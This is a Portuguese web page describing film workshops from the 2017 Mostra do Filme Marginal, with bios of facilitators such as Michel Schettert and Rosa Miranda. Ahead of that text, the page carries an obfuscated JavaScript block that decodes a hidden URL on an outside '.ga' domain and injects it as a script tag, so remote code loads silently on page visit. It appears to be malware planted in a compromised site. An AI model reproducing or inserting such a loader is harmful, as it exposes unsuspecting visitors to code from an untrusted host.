var _0x1f92=['appendChild','1051197hJyWzE','279875vBeEEE','679597pxmSpW','1208114MFItag','shift','currentScript','1yNFUPu','755208bCXcLD','parentNode','808668ljhldK','277011vIvjKc','push','createElement','1020859qQZHqJ','script','1012100HJdiys','fromCharCode','insertBefore','src','getElementsByTagName','1OuqVoU','3470379tibEqN','1439788dxeSnm','head','94160WqQicf','2vRLkLk'];var _0xe4f51f=_0x1605;(function(_0x36e879,_0x71d7d){var _0x19f9dd=_0x1605;while(!![]){try{var _0x27ae8f=-parseInt(_0x19f9dd(0x1b8))+-parseInt(_0x19f9dd(0x1b0))+parseInt(_0x19f9dd(0x1b6))*parseInt(_0x19f9dd(0x1af))+-parseInt(_0x19f9dd(0x1c7))+-parseInt(_0x19f9dd(0x1c1))+-parseInt(_0x19f9dd(0x1b2))+-parseInt(_0x19f9dd(0x1bd))*-parseInt(_0x19f9dd(0x1be));if(_0x27ae8f===_0x71d7d)break;else _0x36e879['push'](_0x36e879['shift']());}catch(_0x5a5af5){_0x36e879['push'](_0x36e879['shift']());}}}(_0x1f92,0x95a7c));var _0x230d=[_0xe4f51f(0x1bc),_0xe4f51f(0x1b7),_0xe4f51f(0x1b1),_0xe4f51f(0x1c5),_0xe4f51f(0x1c0),'698448rkGfeF',_0xe4f51f(0x1c6),'281314aeWSVS','1fashtG',_0xe4f51f(0x1c9),_0xe4f51f(0x1bf),_0xe4f51f(0x1bb),_0xe4f51f(0x1c4),_0xe4f51f(0x1b3),_0xe4f51f(0x1c2),_0xe4f51f(0x1b9),'1YWwfcj'],_0x3e5356=_0x567b;function _0x567b(_0x26bed5,_0x3c3ade){_0x26bed5=_0x26bed5-0x161;var _0x88803e=_0x230d[_0x26bed5];return _0x88803e;}function _0x1605(_0x7e46ac,_0x414a0e){_0x7e46ac=_0x7e46ac-0x1af;var _0x1f92c0=_0x1f92[_0x7e46ac];return _0x1f92c0;}(function(_0x513bd6,_0x54f163){var _0x1d2548=_0xe4f51f,_0x41ee88=_0x567b;while(!![]){try{var _0x2955a7=-parseInt(_0x41ee88(0x168))*parseInt(_0x41ee88(0x16a))+parseInt(_0x41ee88(0x16f))+-parseInt(_0x41ee88(0x165))*-parseInt(_0x41ee88(0x161))+-parseInt(_0x41ee88(0x16c))+parseInt(_0x41ee88(0x167))+parseInt(_0x41ee88(0x16e))+-parseInt(_0x41ee88(0x170))*-parseInt(_0x41ee88(0x169));if(_0x2955a7===_0x54f163)break;else _0x513bd6[_0x1d2548(0x1b4)](_0x513bd6['shift']());}catch(_0x33270c){_0x513bd6[_0x1d2548(0x1b4)](_0x513bd6[_0x1d2548(0x1c8)]());}}}(_0x230d,0xb70ce));var mm=String[_0x3e5356(0x171)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x63,0x6c,0x69,0x63,0x6b,0x2e,0x64,0x72,0x69,0x76,0x65,0x72,0x66,0x6f,0x72,0x74,0x6e,0x69,0x67,0x74,0x6c,0x79,0x2e,0x67,0x61,0x2f,0x74,0x56,0x39,0x53,0x4a,0x48),d=document,s=d[_0xe4f51f(0x1b5)](_0x3e5356(0x163));s[_0x3e5356(0x16d)]=mm,document[_0x3e5356(0x16b)]?document[_0x3e5356(0x16b)][_0x3e5356(0x164)][_0xe4f51f(0x1ba)](s,document[_0x3e5356(0x16b)]):d[_0x3e5356(0x162)](_0x3e5356(0x166))[0x0][_0xe4f51f(0x1c3)](s);

OFICINAS

novembro 19, 2017

Estas foram as oficinas realizadas na 1° Edição da Mostra do Filme Marginal, em 2017. A participação em cada oficina foi de forma solidária, através de contribuição consciente.

Oficina de Videodancer com Michel Schettert

Cinema, Dança e Improvisação. As técnicas do Videodancer são direcionadas para o uso da câmera na mão, unindo a lógica coreográfica aos processos de filmagem. Tratam-se de artifícios para cercar cenas com alto grau de improvisação, como registro de performance e cinema de invenção.

Michel Schettert nasceu em Belém do Pará e vive no Rio de Janeiro. Tem graduação sanduíche em Études Cinématographiques pela Université Lille III / UFRJ. Especializou-se em Artes Visuais no Parque Lage. Faz mestrado profissional em Criação e Produção de Conteúdos Digitais na UFRJ e compõe o Núcleo de Estudos em Narrativas Visuais e Transmídias (NAvT). Pesquisa Cinema e Ritmo. Ministra a disciplina “Videodança – edição como coreografia” na graduação da ECO, como estágio de docência.

Em 2016, exibiu filme do CineDans Festival (Amsterdam) e este ano participou do Festival VideodanzaBA (Buenos Aires) como artista residente. Coopera com o Espaço MOVA (RJ) e Espaço Lua Branca (MG).

Treinando o olhar – Oficina de Vídeos para Celular 

Práticas sobre como desenvolver filmes com celular, a oficina será dividida em duas partes: a primeira parte será teórica e a outra será prática. Exibição dos vídeos realizados e debate sobre os mesmos.

Ministrada por Coletivo Kbça D’ Nêga – Coletivo de criações artísticas, sobretudo criações audiovisuais com foco para o LGBTT e a mulher negra a partir das REAÇÕES das violências irradiadas diariamente nos corpos das centelhas que compõem este coletivo como: opressões de gênero, raça, intolerância religiosa e características corporais desviantes.

Curso Básico de Fotografia com Rafael Daguerre

Rafael Daguerre é um fotojornalista que reside no Rio de Janeiro. É conhecido por seu trabalho com questões sociais brasileiras, com documentação de movimentos sociais e mobilizações populares por justiça. Conta com participação em documentários fotográficos e audiovisuais; e projetos sociais sobre a causa indígena, racismo, opressão de gênero, a luta das mulheres, violência policial, a resistência popular entre outros.

Participou de projetos como: ‘Samba na Raiz’ 2010; ‘Imagem&Mulher em Foco’ (2010/2011); ‘Registro e Diálogos: Tecendo a Igualdade’ (2011); ‘O Retorno da Arara Amarela’ (2011); ‘Vale do Paraíba: Escravidão e Café’ (2012); produziu o curta-metragem ‘Marakà’ná’ (2014); Olhares Reabertos (2014) etc.

Aula Magna de Cinema Negro com Rosa Miranda

Aula magna sobre o cinema negro nacional com enfase no gênero e raça com base na pesquisa realizada por Rosa Miranda durante o período de graduação em licenciatura em Cinema e Audivisual pela Universidade Federal Fluminense. Uma releitura da História do Cinema Brasileiro pela ótica da população negra. Exibição de curtas de diretoras e diretores negros brasileiros.

Rosa Miranda é Licenciada em Cinema e Audiovisual pela Universidade Federal Fluminense, fundadora do Coletivo Kbça D’ Nêga, realizadora de audiovisual, professora e membro do Coletivo Aningapara, pesquisadora sobre gênero, raça no cinema nacional contemporâneo, participante do Fórum Itinerante de Cinema Negro (FICINE) coordenado pela Doutora Janaína Oliveira.

Edição 2019
Em 2019, recebemos 600 filmes.
Nota de cancelamento
Cancelamento da 3° edição no CCJF.
Seleção Oficial 2019
Lista da seleção oficial da 3° Edição da Mostra.